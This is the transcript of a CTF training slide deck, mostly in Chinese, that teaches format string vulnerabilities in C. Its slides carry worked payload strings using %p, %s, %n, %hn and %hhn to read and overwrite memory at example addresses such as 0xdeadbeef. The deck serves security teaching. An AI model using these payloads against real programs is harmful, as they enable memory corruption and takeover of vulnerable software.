Pwn III

7edd639eb967c027bcf37b98f62d86ec?s=47 Jesse Huang
December 10, 2018

Pwn III

Binary Exploitation III (Format String Vulnerabilities)
Shared at NTNU CSIE CTF Training Course

7edd639eb967c027bcf37b98f62d86ec?s=128

Jesse Huang

December 10, 2018
Tweet

Transcript

  1. 2.

    Format String? • 沒錯,就是 C 的 format string ◦ printf(“%d”,

    123); ◦ printf(“%d %s”, 87, “hahaha”); • How about... ◦ printf(“%d”); ◦ printf(“%x%x%x%x”);
  2. 3.

    Format String Vulnerability • Format String 語法上並無強制要求 placeholder(%d, %s ...)

    和參數的數量需要一致 • 若 placeholder 和參數數量不一致,則會發生非預 期的行為(資訊洩漏, Information leakage )
  3. 8.

    Read from arbitrary memory printf(“%p %3$p %8$p %11$p %13$p); arg8

    arg7 arg9 arg10 canary rbp ret reg value rdi “%p %3$p ….” rsi ... rdx ... rcx ... arg6 任意讀取stack上位址
  4. 9.

    Read from arbitrary memory buf = “%9$saaaa\xEF\xBE\xAD\xDE\x 00\x00\x00\x00”; printf(buf); %9$saaaa

    arg7 \xEF\xBE\xAD\xDE \x00\x00\x00\x00 arg10 canary rbp ret arg6 若是format string存在stack上,可 以將位址寫到format string中達到 任意讀取,但若位址中有\x00會截 斷字串,可放在尾端
  5. 12.

    Write to arbitrary memory buf = “%16c%11$naaaaaaaa\xEF\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %16c%11$

    arg7 naaaaaaa \xEF\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x12345678
  6. 13.

    Write to arbitrary memory buf = “%16c%11$naaaaaaaa\xEF\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %16c%11$

    arg7 naaaaaaa \xEF\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x00000010
  7. 14.

    Write to arbitrary memory • %n 一次寫入 int 的大小 (4bytes)

    若是欲寫入的數字很大,輸出時間會很久 • %ln : 寫入 8 bytes (long) • %hn : 寫入 2 bytes (short) • %hhn : 寫入 1 byte ( char)
  8. 15.

    Write to arbitrary memory buf = “%16c%11$hnaaaaaaa\xEF\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %16c%11$

    arg7 hnaaaaaa \xEF\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x12345678
  9. 16.

    Write to arbitrary memory buf = “%16c%11$hnaaaaaaa\xEF\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %16c%11$

    arg7 hnaaaaaa \xEF\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x12340010
  10. 17.

    Write to arbitrary memory buf = “%11$hnaaaaaaaaaaa\xF1\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %11$hnaa

    arg7 aaaaaaaa \xF1\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x12340010
  11. 18.

    Write to arbitrary memory buf = “%11$hnaaaaaaaaaaa\xF1\xBE\ xAD\xDE\x00\x00\x00\x00”; printf(buf); %11$hnaa

    arg7 aaaaaaaa \xF1\xBE\xAD\xDE \x00\x00\x00\x00 arg6 將0xdeadbeef寫為0x00000010 arg8 0xDEADBEEF 0x00000010
  12. 20.

    Write to arbitrary memory buf = “%12c%11$hhn%164c%12$hhn%30 c%13$hhn%44c%14$hhn\xEF\xBE \xAD\xDE\x00\x00\x00\x00... printf(buf);

    %12c%11$ hnn%164c ... arg6 將0xdeadbeef寫為0xfaceb00c 0xDEADBEEF 0x12345678 \xEF\xBE\xAD\xDE \x00\x00\x00\x00 …. \xF2\xBE\xAD\xDE \x00\x00\x00\x00 %12$hhn% 30c%13$h
  13. 21.

    Write to arbitrary memory buf = “%12c%11$hhn%164c%12$hhn%30 c%13$hhn%44c%14$hhn\xEF\xBE \xAD\xDE\x00\x00\x00\x00... printf(buf);

    %12c%11$ hnn%164c ... arg6 將0xdeadbeef寫為0xfaceb00c 12 (0c) 0xDEADBEEF 0x1234560c \xEF\xBE\xAD\xDE \x00\x00\x00\x00 …. \xF2\xBE\xAD\xDE \x00\x00\x00\x00 %12$hhn% 30c%13$h
  14. 22.

    Write to arbitrary memory buf = “%12c%11$hhn%164c%12$hhn%30 c%13$hhn%44c%14$hhn\xEF\xBE \xAD\xDE\x00\x00\x00\x00... printf(buf);

    %12c%11$ hnn%164c ... arg6 將0xdeadbeef寫為0xfaceb00c 12 (0c) 12 + 164 = 176(b0) 0xDEADBEEF 0x1234b00c \xEF\xBE\xAD\xDE \x00\x00\x00\x00 …. \xF2\xBE\xAD\xDE \x00\x00\x00\x00 %12$hhn% 30c%13$h
  15. 23.

    Write to arbitrary memory buf = “%12c%11$hhn%164c%12$hhn%30 c%13$hhn%44c%14$hhn\xEF\xBE \xAD\xDE\x00\x00\x00\x00... printf(buf);

    %12c%11$ hnn%164c ... arg6 將0xdeadbeef寫為0xfaceb00c 12 (0c) 12 + 164 = 176(b0) 176 + 30 = 206(ce) 0xDEADBEEF 0x12ceb00c \xEF\xBE\xAD\xDE \x00\x00\x00\x00 …. \xF2\xBE\xAD\xDE \x00\x00\x00\x00 %12$hhn% 30c%13$h
  16. 24.

    Write to arbitrary memory buf = “%12c%11$hhn%164c%12$hhn%30 c%13$hhn%44c%14$hhn\xEF\xBE \xAD\xDE\x00\x00\x00\x00... printf(buf);

    %12c%11$ hnn%164c ... arg6 將0xdeadbeef寫為0xfaceb00c 12 (0c) 12 + 164 = 176(b0) 176 + 30 = 206(ce) 206 + 44 = 250(fa) 0xDEADBEEF 0xfaceb00c \xEF\xBE\xAD\xDE \x00\x00\x00\x00 …. \xF2\xBE\xAD\xDE \x00\x00\x00\x00 %12$hhn% 30c%13$h
  17. 25.

    Write to arbitrary memory • Tips ◦ 記得 %n 的字元數是累積的

    ◦ 要寫入的數字 < 已輸出字元數 ▪ +256 (char overflow) ◦ 可以直接預留一段 padding 放位址,會比較好 算